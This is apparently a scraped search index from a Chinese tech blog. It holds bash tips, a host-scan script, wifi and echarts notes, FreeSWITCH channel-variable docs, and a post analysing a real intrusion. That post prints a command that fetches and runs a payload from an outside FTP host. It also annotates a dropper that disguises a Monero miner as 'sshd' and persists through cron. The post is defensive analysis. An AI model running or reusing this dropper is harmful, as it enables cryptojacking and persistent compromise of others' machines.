\u0026#34;${TMUX:+\\\\ePtmux;\\\\e}\\\\e[14t${TMUX:+\\\\e\\\\\\\\}\u0026#34; IFS=\u0026#39;;t\u0026#39; read -d t -t 0.05 -sra term_size printf \u0026#39;%s\\n\u0026#39; \u0026#34;${term_size[1]}x${term_size[2]}\u0026#34; } Example Usage:\n# Output: WIDTHxHEIGHT $ get_window_size 1200x800 # Output (fail): $ get_window_size x Get the current cursor position This is useful when creating a TUI in pure bash.\nExample Function:\nget_cursor_pos() { # Usage: get_cursor_pos IFS=\u0026#39;[;\u0026#39; read -p $\u0026#39;\\e[6n\u0026#39; -d R -rs _ y x _ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$x $y\u0026#34; } Example Usage:\n# Output: X Y $ get_cursor_pos 1 8 CONVERSION Convert a hex color to RGB Example Function:\nhex_to_rgb() { # Usage: hex_to_rgb \u0026#34;#FFFFFF\u0026#34; # hex_to_rgb \u0026#34;000000\u0026#34; : \u0026#34;${1/\\#}\u0026#34; ((r=16#${_:0:2},g=16#${_:2:2},b=16#${_:4:2})) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$r $g $b\u0026#34; } Example Usage:\n$ hex_to_rgb \u0026#34;#FFFFFF\u0026#34; 255 255 255 Convert an RGB color to hex Example Function:\nrgb_to_hex() { # Usage: rgb_to_hex \u0026#34;r\u0026#34; \u0026#34;g\u0026#34; \u0026#34;b\u0026#34; printf \u0026#39;#%02x%02x%02x\\n\u0026#39; \u0026#34;$1\u0026#34; \u0026#34;$2\u0026#34; \u0026#34;$3\u0026#34; } Example Usage:\n$ rgb_to_hex \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; #FFFFFF CODE GOLF Shorter for loop syntax # Tiny C Style. for((;i++\u0026lt;10;)){ echo \u0026#34;$i\u0026#34;;} # Undocumented method. for i in {1..10};{ echo \u0026#34;$i\u0026#34;;} # Expansion. for i in {1..10}; do echo \u0026#34;$i\u0026#34;; done # C Style. for((i=0;i\u0026lt;=10;i++)); do echo \u0026#34;$i\u0026#34;; done Shorter infinite loops # Normal method while :; do echo hi; done # Shorter for((;;)){ echo hi;} Shorter function declaration # Normal method f(){ echo hi;} # Using a subshell f()(echo hi) # Using arithmetic # This can be used to assign integer values. # Example: f a=1 # f a++ f()(($1)) # Using tests, loops etc. # NOTE: ‘while’, ‘until’, ‘case’, ‘(())’, ‘[[]]’ can also be used. f()if true; then echo \u0026#34;$1\u0026#34;; fi f()for i in \u0026#34;$@\u0026#34;; do echo \u0026#34;$i\u0026#34;; done Shorter if syntax # One line # Note: The 3rd statement may run when the 1st is true [[ $var == hello ]] \u0026amp;\u0026amp; echo hi || echo bye [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi; echo there; } || echo bye # Multi line (no else, single statement) # Note: The exit status may not be the same as with an if statement [[ $var == hello ]] \u0026amp;\u0026amp; echo hi # Multi line (no else) [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi # ... } Simpler case statement to set variable The : built-in can be used to avoid repeating variable= in a case statement. The $_ variable stores the last argument of the last command. : always succeeds so it can be used to store the variable value.\n# Modified snippet from Neofetch. case \u0026#34;$OSTYPE\u0026#34; in \u0026#34;darwin\u0026#34;*) : \u0026#34;MacOS\u0026#34; ;; \u0026#34;linux\u0026#34;*) : \u0026#34;Linux\u0026#34; ;; *\u0026#34;bsd\u0026#34;* | \u0026#34;dragonfly\u0026#34; | \u0026#34;bitrig\u0026#34;) : \u0026#34;BSD\u0026#34; ;; \u0026#34;cygwin\u0026#34; | \u0026#34;msys\u0026#34; | \u0026#34;win32\u0026#34;) : \u0026#34;Windows\u0026#34; ;; *) printf \u0026#39;%s\\n\u0026#39; \u0026#34;Unknown OS detected, aborting...\u0026#34; \u0026gt;\u0026amp;2 exit 1 ;; esac # Finally, set the variable. os=\u0026#34;$_\u0026#34; OTHER Use read as an alternative to the sleep command Surprisingly, sleep is an external command and not a bash built-in.\nCAVEAT: Requires bash 4+\nExample Function:\nread_sleep() { # Usage: read_sleep 1 # read_sleep 0.2 read -rt \u0026#34;$1\u0026#34; \u0026lt;\u0026gt; \u0026lt;(:) || : } Example Usage:\nread_sleep 1 read_sleep 0.1 read_sleep 30 For performance-critical situations, where it is not economic to open and close an excessive number of file descriptors, the allocation of a file descriptor may be done only once for all invocations of read:\n(See the generic original implementation at https://blog.dhampir.no/content/sleeping-without-a-subprocess-in-bash-and-how-to-sleep-forever)\nexec {sleep_fd}\u0026lt;\u0026gt; \u0026lt;(:) while some_quick_test; do # equivalent of sleep 0.001 read -t 0.001 -u $sleep_fd done Check if a program is in the user\u0026rsquo;s PATH # There are 3 ways to do this and either one can be used. type -p executable_name \u0026amp;\u0026gt;/dev/null hash executable_name \u0026amp;\u0026gt;/dev/null command -v executable_name \u0026amp;\u0026gt;/dev/null # As a test. if type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is in PATH. fi # Inverse. if ! type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is not in PATH. fi # Example (Exit early if program is not installed). if ! type -p convert \u0026amp;\u0026gt;/dev/null; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;error: convert is not installed, exiting...\u0026#34; exit 1 fi Get the current date using strftime Bash’s printf has a built-in method of getting the date which can be used in place of the date command.\nCAVEAT: Requires bash 4+\nExample Function:\ndate() { # Usage: date \u0026#34;format\u0026#34; # See: \u0026#39;man strftime\u0026#39; for format. printf \u0026#34;%($1)T\\\\n\u0026#34; \u0026#34;-1\u0026#34; } Example Usage:\n# Using above function. $ date \u0026#34;%a %d %b - %l:%M %p\u0026#34; Fri 15 Jun - 10:00 AM # Using printf directly. $ printf \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#34;-1\u0026#34; Fri 15 Jun - 10:00 AM # Assigning a variable using printf. $ printf -v date \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#39;-1\u0026#39; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$date\u0026#34; Fri 15 Jun - 10:00 AM Get the username of the current user CAVEAT: Requires bash 4.4+\n$ : \\\\u # Expand the parameter as if it were a prompt string. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${_@P}\u0026#34; black Generate a UUID V4 CAVEAT: The generated value is not cryptographically secure.\nExample Function:\nuuid() { # Usage: uuid C=\u0026#34;89ab\u0026#34; for ((N=0;N\u0026lt;16;++N)); do B=\u0026#34;$((RANDOM%256))\u0026#34; case \u0026#34;$N\u0026#34; in 6) printf \u0026#39;4%x\u0026#39; \u0026#34;$((B%16))\u0026#34; ;; 8) printf \u0026#39;%c%x\u0026#39; \u0026#34;${C:$RANDOM%${#C}:1}\u0026#34; \u0026#34;$((B%16))\u0026#34; ;; 3|5|7|9) printf \u0026#39;%02x-\u0026#39; \u0026#34;$B\u0026#34; ;; *) printf \u0026#39;%02x\u0026#39; \u0026#34;$B\u0026#34; ;; esac done printf \u0026#39;\\n\u0026#39; } Example Usage:\n$ uuid d5b6c731-1310-4c24-9fe3-55d556d44374 Progress bars This is a simple way of drawing progress bars without needing a for loopin the function itself.\nExample Function:\nbar() { # Usage: bar 1 10 # ^----- Elapsed Percentage (0-100). # ^-- Total length in chars. ((elapsed=$1*$2/100)) # Create the bar with spaces. printf -v prog \u0026#34;%${elapsed}s\u0026#34; printf -v total \u0026#34;%$(($2-elapsed))s\u0026#34; printf \u0026#39;%s\\r\u0026#39; \u0026#34;[${prog// /-}${total}]\u0026#34; } Example Usage:\nfor ((i=0;i\u0026lt;=100;i++)); do # Pure bash micro sleeps (for the example). (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) # Print the bar. bar \u0026#34;$i\u0026#34; \u0026#34;10\u0026#34; done printf \u0026#39;\\n\u0026#39; Get the list of functions in a script get_functions() { # Usage: get_functions IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra functions \u0026lt; \u0026lt;(declare -F) printf \u0026#39;%s\\n\u0026#39; \u0026#34;${functions[@]//declare -f }\u0026#34; } Bypass shell aliases # alias ls # command # shellcheck disable=SC1001 \\ls Bypass shell functions # function ls # command command ls 后台运行命令 This will run the given command and keep it running, even after the terminal or SSH connection is terminated. All output is ignored.\nbkr() { (nohup \u0026#34;$@\u0026#34; \u0026amp;\u0026gt;/dev/null \u0026amp;) } bkr ./some_script.sh # some_script.sh is now running in the background AFTERWORD Thanks for reading! If this bible helped you in any way and you\u0026rsquo;d like to give back, consider donating. Donations give me the time to make this the best resource possible. Can\u0026rsquo;t donate? That\u0026rsquo;s OK, star the repo and share it with your friends!\n","permalink":"https://wdd.js.org/shell/pure-bash-bible/","summary":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.","title":"pure-bash-bible"},{"content":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.2\n用 fping 去执行,同样 256 个主机,只需要 5-6s\nfping -g 192.168.1.0/24 -r 1 -a -s ","permalink":"https://wdd.js.org/shell/list-active-host/","summary":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.","title":"列出网络中活动的主机"},{"content":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.supportxmr.com门罗币的矿池 # 所以大家应该清楚了,入侵的机器应该用来挖矿的 # 这一步是测试本机与矿池dns是否通 if [ $(ping -c 1 pool.supportxmr.com 2\u0026gt;/dev/null|grep \u0026#34;bytes of data\u0026#34; | wc -l ) -gt \u0026#39;0\u0026#39; ]; then dns=\u0026#34;\u0026#34; # dns通 else dns=\u0026#34;-d\u0026#34; # dns不通 fi # 删除用户计划任务,并将报错信息清除 crontab -r 2\u0026gt;/dev/null # 这一步不太懂 rm -rf /tmp/.lock 2\u0026gt;/dev/null # 设置当前进程的名字,为了掩人耳目,起个sshd, 鱼目混珠 EXEC=\u0026#34;sshd\u0026#34; # 获取当前目录 DIR=`pwd` # 获取参数个数 # 这个程序传了一个 -r 参数,所以$#的值是1 if [ \u0026#34;$#\u0026#34; == \u0026#34;0\u0026#34; ];\tthen ARGS=\u0026#34;\u0026#34; else # 遍历每一个参数 for var in \u0026#34;$@\u0026#34; do if [ \u0026#34;$var\u0026#34; != \u0026#34;-f\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $var\u0026#34; # $var不是-f, 所以ARGS被这是为-r fi if [ ! -z \u0026#34;$FAKEPROC\u0026#34; ];\tthen FAKEPROC=$((FAKEPROC+1)) # 这里不会执行,因为$FAKEPROC是空字符串 fi if [ \u0026#34;$var\u0026#34; == \u0026#34;-h\u0026#34; ];\tthen FAKEPROC=\u0026#34;1\u0026#34; # 这里也不会执行 fi if [[ \u0026#34;$FAKEPROC\u0026#34; == \u0026#34;2\u0026#34; ]];\tthen EXEC=\u0026#34;$var\u0026#34; # 这里也不会执行 fi if [ ! -z \u0026#34;$dns\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $dns\u0026#34; # 如果本机与矿池dns通,则这里不会执行 fi done fi # 创建目录 mkdir -- \u0026#34;.$EXEC\u0026#34; #创建 .sshd目录 cp -f -- `uname -m` \u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; # uname -m获取系统架构,然后判断要把i686还是x86_64拷贝到.sshd目录, 并重命名为sshd ./\u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; $ARGS -f -c # 执行改名后的文件 rm -rf \u0026#34;.$EXEC\u0026#34; # 生成后续执行的脚本 echo \u0026#34;#!/bin/bash cd -- $DIR mkdir -- .$EXEC cp -f -- `uname -m` .$EXEC/$EXEC ./.$EXEC/$EXEC $ARGS -c rm -rf .$EXEC\u0026#34; \u0026gt; \u0026#34;$EXEC\u0026#34; chmod +x -- \u0026#34;$EXEC\u0026#34; # 执行脚本 ./\u0026#34;$EXEC\u0026#34; # 生成计划任务执行脚本 (echo \u0026#34;* * * * * `pwd`/$EXEC\u0026#34;) | sort - | uniq - | crontab - # 删除go脚本 rm -rf go 上文的脚本中,有许多命令后跟着 -- 和 - 这两个参数都是 bash 脚本的内置参数,用来标记命令的内置参数已经结束。\n由于 x86_64 和 i686 是可执行文件,就不分析了。\n恶意文件清除 清除 crontab 定时任务 清除可执行文件。可以 ll /proc/pid/exe , 看下恶意进程的可执行文件位置 kill 恶意程序的进程 修改 root 密码 如何防护 使用强密码,至少 32 位 使用 ssh key 登录 有些脚本会把名字伪装成系统服务,所以不要被进程的名字迷惑,而应该看看这个进程使用的资源是否合理。一个 sshd 的进程,正常来说占用 cpu 和内存不会超过 1%。如果你发现一个占用 CPU%的 sshd 进程,你就要小心这东西是不是滥竽充数了。 ","permalink":"https://wdd.js.org/shell/evil-script/","summary":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.","title":"入侵脚本分析 - 瞒天过海"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/drkxqu/","summary":"","title":"进程实战"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/caytlk/","summary":"","title":"docker slim"},{"content":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。\n","permalink":"https://wdd.js.org/posts/2019/12/mgyw98/","summary":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。","title":"wifi工作模式测试"},{"content":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echars的bug\n解决方案,查询是设置epoch=s, 用unix秒数来格式化事件\n","permalink":"https://wdd.js.org/posts/2019/12/nolg61/","summary":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echars的bug","title":"influxdb时间精度到秒"},{"content":"\nAbout Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.  Click here to expand Table of Contents Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:\n$${variable} is expanded once when FreeSWITCH™ first parses the configuration on startup or after invoking reloadxml. It is suitable for variables that do not change, such as the domain of a single-tenant FreeSWITCH™ server. That is why $${domain} is referenced so frequently in the vanilla dialplan examples. ${variable} is expanded during each pass through the dialplan, so it is used for variables that are expected to change, such as the ${destination_number} or ${sip_to_user} fields. Channel Variables in the XML Dialplan Channel variables are set, appropriately enough, with the set application:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;var_name=var value\u0026rdquo;/\u0026gt; Reading channel variables requires the ${} syntax:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO The value in the var_name chan var is ${var_name}\u0026rdquo;/\u0026gt;\u0026lt;condition field=\u0026quot;${var_name}\u0026quot; expression=\u0026ldquo;some text\u0026rdquo;\u0026gt; Scoped Variables Channel variables used to be global to the session. As of b2c3199f, it is possible to set variables that only exist within a single application execution and any subsequent applications under it. For example, applications can use scoped variables for named input params:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026quot;%[myvar=Hello]INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026quot;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;myapp\u0026rdquo; data=\u0026quot;%[var1=val1,var2=val2]mydata\u0026quot;/\u0026gt; Channel Variables in Dial Strings The variable assignment syntax for dial strings differs depending on which scope they should apply to:\n{foo=bar} is only valid at the beginning of the dial string. It will set the same variables on every channel, but does not do so for enterprise bridging/originate. \u0026lt;foo=bar\u0026gt; is only valid at the beginning of a dial string. It will set the same variables on every channel, including all thos in an enterprise bridging/originate. [foo=bar] goes before each individual dial string and will set the variable values specified for only this channel. ExamplesSet foo variable for all channels implemented and chan=1 will only be set for blah, while chan=2 will only be set for blah2:\n{foo=bar}[chan=1]sofia/default/blah@baz.com,[chan=2]sofia/default/blah2@baz.com Set multiple variables by delimiting with commas:\n[var1=abc,var2=def,var3=ghi]sofia/default/blah@baz.com To have variables in [] override variables in {}, set local_var_clobber=true inside {}. You must also set local_var_clobber=true when you want to override channel variables that have been exported to your b-legs in your dialplan. In this example, the legs for blah1@baz.com and johndoe@example.com would be set to offer SRTP (RTP/SAVP) while janedoe@acme.com would not receive an SRTP offer (she would see RTP/AVP instead):\n{local_var_clobber=true,rtp_secure_media=true}sofia/default/blah1@baz.com|sofia/default/johndoe@example.com|rtp_secure_media=false]sofia/default/janedoe@acme.com Escaping/Redefining Delimiters Commas are the default delimiter inside variable assignment tags. In some cases (like in absolute_codec_string), we may need to define variables whose values contain literal commas that should not be interpreted as delimiters. We can redefine the delimiter for a variable using ^^ followed by the desired delimiter:\n^^;one,two,three;four,five,six;seven,eight,nine To set absolute_codec_string=PCMA@8000h@20i@64000b,PCMU@8000h@20i@64000b,G729@8000h@20i@8000b in a dial string:\n{absolute_codec_string=^^:PCMA@8000h@20i@64000b:PCMU@8000h@20i@64000b:G729@8000h@20i@8000b,leg_time_out=10,process_cdr=b_only} This approach does not work when setting sip_h_, sip_rh_, and sip_ph headers. To pass a comma into the contents of a private header, escape the comma with a backslash:\n{sip_h_X-My-Header=one\\,two\\,three,leg_time_out=10,process_cdr=b_only} Exporting Channel Variables in Bridge Operations Variables from one call leg (A) can be exported to the other call leg (B) by using the export_vars variable. Its value is a comma separated list of variables that should propagate across calls.\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;export_vars=myvar,myvar2,foo,bar\u0026rdquo;/\u0026gt; To set a variable on the A-leg and add it to the export list, use the export application:\n\u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;myvar=true\u0026rdquo;/\u0026gt; Using Channel Variables in Dialplan Condition Statements Channel variables can be used in conditions, refer to XML Dialplan Conditions for more information. Some channel variables may not be set during the dialplan parsing phrase. See Inline Actions. Custom Channel Variables We are not constrained to the channel variables that FreeSWITCH™, its modules, and applications define. It is possible to set any number of unique channel variables for any purpose. They can also be logged in CDR. The set application can be used to set any channel variable:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718b\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;campaign_id=333814\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;crm_tags=referral new loyal\u0026rdquo; /\u0026gt; In a command issued via mod_xml_rpc or mod_event_socket:\noriginate {lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718,campaign_id=333814}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Values with spaces must be enclosed by quotes:\noriginate {crm_tags=\u0026lsquo;referral new loyal'}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Channel Variable Manipulation Channel variables can be manipulated for varied results. For example, a channel variable could be trimmed to get the first three digits of a phone number. Manipulating Channel Variables discusses this in detail. Channel Variable Scope Example Consider this example:\n\u0026lt;extension name=\u0026ldquo;test\u0026rdquo; continue=\u0026ldquo;false\u0026rdquo;\u0026gt; \u0026lt;condition field=\u0026ldquo;destination_number\u0026rdquo; expression=\u0026quot;^test([0-9]+)$\u0026quot;\u0026gt; \u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;fruit=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;veggie=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;bridge\u0026rdquo; data=\u0026quot;{meat=tomato}sofia/gateway/testaccount/1234\u0026quot; /\u0026gt; \u0026lt;/condition\u0026gt;\u0026lt;/extension\u0026gt; Leg A (the channel that called the dial plan) will have these variables set:\nfruit: tomatoveggie: tomato Leg B (the channel created with sofia/gateway/testaccount/1234) will have these variables set:\nfruit: tomatomeat: tomato Accessing Channel Variables in Other Environments In addition to the dialplan, channel variables can be set in other environments as well.In a FreeSWITCH™ module, written in C:\nswitch_channel_set_variable(channel,\u0026ldquo;name\u0026rdquo;,\u0026ldquo;value\u0026rdquo;);char* result = switch_channel_get_variable(channel,\u0026ldquo;name\u0026rdquo;); char* result = switch_channel_get_variable_partner(channel,\u0026ldquo;name\u0026rdquo;); In the console (or fs_cli, implemented in mod_commands): uuid_getvar uuid_setvar []uuid_setvar_multi =[;=[;\u0026hellip;]] Alternatively, call uuid_dump to get all the variables, or use the eval command, adding the prefix variable_ to the key:\nuuid_dump eval uuid: ${variable_} In an event socket, just extend the above with the api prefix:\napi uuid_getvar In Lua, there are several ways to interact with variables. In the freeswitch.Session() invocation that creates a new Session object, variables go in square brackets:\ns = freeswitch.Session(\u0026quot;[myname=myvars]sofia/localhost/1003\u0026quot;) With the new Session object s:\nlocal result1 = s:getVariable(\u0026ldquo;myname\u0026rdquo;) \u0026ndash; \u0026ldquo;myvars\u0026rdquo;s:setVariable(\u0026ldquo;name\u0026rdquo;, \u0026ldquo;value\u0026rdquo;)local result2 = s:getVariable(\u0026ldquo;name\u0026rdquo;) \u0026ndash; \u0026ldquo;value\u0026rdquo; Info Application Variable Names (variable_xxxx) Some variables, as shown from the info app, may have variable_ in front of their names. For example, if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}. Other variables shown in the info app are prepended with channel, which should be stripped as well. The example below show a list of info app variables and the corresponding channel variable names:\nInfo variable name channel variable name Description Channel-State state Current state of the call Channel-State-Number state_number Integer Channel-Name channel_name Channel name Unique-ID uuid uuid of this channel\u0026rsquo;s call leg Call-Direction direction Inbound or Outbound Answer-State state - Channel-Read-Codec-Name read_codec the read codec variable mean the source codec Channel-Read-Codec-Rate read_rate the source rate Channel-Write-Codec-Name write_codec the destination codec same to write_codec if not transcoded Channel-Write-Codec-Rate write_rate destination rate same to read rate if not transcoded Caller-Username username . Caller-Dialplan dialplan user dialplan like xml, lua, enum, lcr Caller-Caller-ID-Name caller_id_name . Caller-Caller-ID-Number caller_id_number . Caller-ANI ani ANI of caller, frequently the same as caller ID number Caller-ANI-II aniii ANI II Digits (OLI - Originating Line Information), if available. Refer to: http://www.nanpa.com/number_resource_info/ani_ii_digits.html Caller-Network-Addr network_addr IP address of calling party Caller-Destination-Number destination_number Destination (dialed) number Caller-Unique-ID uuid This channel\u0026rsquo;s uuid Caller-Source source Source module, i.e. mod_sofia, mod_openzap, etc. Caller-Context context Dialplan context Caller-RDNIS rdnis Redirected DNIS info. See mod_dptools: transfer application Caller-Channel-Name channel_name . Caller-Profile-Index profile_index . Caller-Channel-Created-Time created_time . Caller-Channel-Answered-Time answered_time . Caller-Channel-Hangup-Time hangup_time . Caller-Channel-Transfer-Time transfer_time . Caller-Screen-Bit screen_bit . Caller-Privacy-Hide-Name privacy_hide_name . Caller-Privacy-Hide-Number privacy_hide_number This variable tells you if the inbound call is asking for CLIR[Calling Line ID presentation Restriction] (either with anonymous method or Privacy:id method) initial_callee_id_name Sets the callee id name during the 183. This allows the phone to see a name of who they are calling prior to the phone being answered. An example of setting this to the caller id name of the number being dialled: variable_sip_received_ip sip_received_ip . variable_sip_received_port sip_received_port . variable_sip_authorized sip_authorized . variable_sip_mailbox sip_mailbox . variable_sip_auth_username sip_auth_username . variable_sip_auth_realm 